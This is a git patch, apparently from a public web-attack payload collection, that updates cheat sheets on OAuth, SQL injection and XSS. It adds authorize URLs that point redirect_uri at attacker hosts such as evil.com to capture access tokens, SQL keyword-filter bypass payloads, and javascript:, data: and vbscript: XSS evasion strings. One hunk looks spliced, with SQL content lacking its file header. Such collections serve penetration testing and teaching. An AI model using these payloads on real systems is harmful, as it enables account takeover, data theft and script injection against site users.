From 07388503b02ef5a466fb988987e92e8dc096b243 Mon Sep 17 00:00:00 2001 From: swisskyrepo Date: Sun, 4 Dec 2016 01:03:59 +0700 Subject: [PATCH] XSS,SQL OAuth Updated --- OAuth/README.md | 13 ++++++++++-- README.md | 7 ++----- SQL injection/MySQL Injection.md | 1 - SQL injection/README.md | 36 ++++++++++++++++++++++++++++++++ XSS injection/README.md | 8 ++++++- 5 files changed, 56 insertions(+), 9 deletions(-) diff --git a/OAuth/README.md b/OAuth/README.md index e3efb9c..6f77ecc 100644 --- a/OAuth/README.md +++ b/OAuth/README.md @@ -1,12 +1,20 @@ # OAuth 2 - Common vulnerabilities ## Grabbing OAuth Token via redirect_uri +Redirect to a controlled domain to get the access token ``` https://www.example.com/signin/authorize?[...]&redirect_uri=https://demo.example.com/loginsuccessful -https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost.evil.com -https://www.example.com/oauth20_authorize.srf?[...]&redirect_uri=https://accounts.google.com/BackToAuthSubTarget?next=https://evil.com ``` + +Redirect to an accepted Open URL in to get the access token +``` +https://www.example.com/oauth20_authorize.srf?[...]&redirect_uri=https://accounts.google.com/BackToAuthSubTarget?next=https://evil.com +https://www.example.com/oauth2/authorize?[...]&redirect_uri=https%3A%2F%2Fapps.facebook.com%2Fattacker%2F +``` +OAuth implementations should never whitelist entire domains, only a few URLs so that “redirect_uri” can’t be pointed to an Open Redirect. + + Sometimes you need to change the scope to an invalid one to bypass a filter on redirect_uri: ``` https://www.example.com/admin/oauth/authorize?[...]&scope=a&redirect_uri=https://evil.com @@ -31,3 +39,4 @@ and SHOULD revoke (when possible) all tokens previously issued based on that aut * http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html * http://homakov.blogspot.ch/2014/02/how-i-hacked-github-again.html * http://intothesymmetry.blogspot.ch/2014/04/oauth-2-how-i-have-hacked-facebook.html +* http://andrisatteka.blogspot.ch/2014/09/how-microsoft-is-giving-your-data-to.html diff --git a/README.md b/README.md index abc1777..b2eb516 100644 --- a/README.md +++ b/README.md @@ -5,12 +5,9 @@ I <3 pull requests :) Last modifications : * XSS paylods improved -* Methodology added +* OAuth vulnerabilities added * AWS Bucket added - - -Extract nice bypass from https://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/ - +* SQL payloads updated # Tools diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md index 6515ee5..dcecf3d 100644 --- a/SQL injection/MySQL Injection.md +++ b/SQL injection/MySQL Injection.md @@ -40,7 +40,6 @@ AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1) AND MAKE_SET(YOLO LIMIT 1 OFFSET 0 +SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1). +``` + +Blacklist using keywords - bypass using uppercase/lowercase +``` +?id=1 AND 1=1# +?id=1 AnD 1=1# +?id=1 aNd 1=1# +``` + +Blacklist using keywords case insensitive - bypass using equivalent +``` +AND -> && +OR -> || += -> LIKE,REGEXP, not < and not > +WHERE -> HAVING +``` + + + + ## Thanks to - Other resources * MySQL: - [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet) diff --git a/XSS injection/README.md b/XSS injection/README.md index 62a9e9f..c391143 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -113,6 +113,9 @@ java%0dscript:alert(1) - CR (\r) Using the escape character \j\av\a\s\cr\i\pt\:\a\l\ert\(1\) +Using the newline and a comment // +javascript://%0Aalert(1) +javascript://anything%0D%0A%0D%0Awindow.alert(1) ``` XSS with data: @@ -121,7 +124,10 @@ data:text/html, data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ ``` - +XSS with vbscript: only IE +``` +vbscript:msgbox("XSS") +``` ## XSS in files XSS in XML ```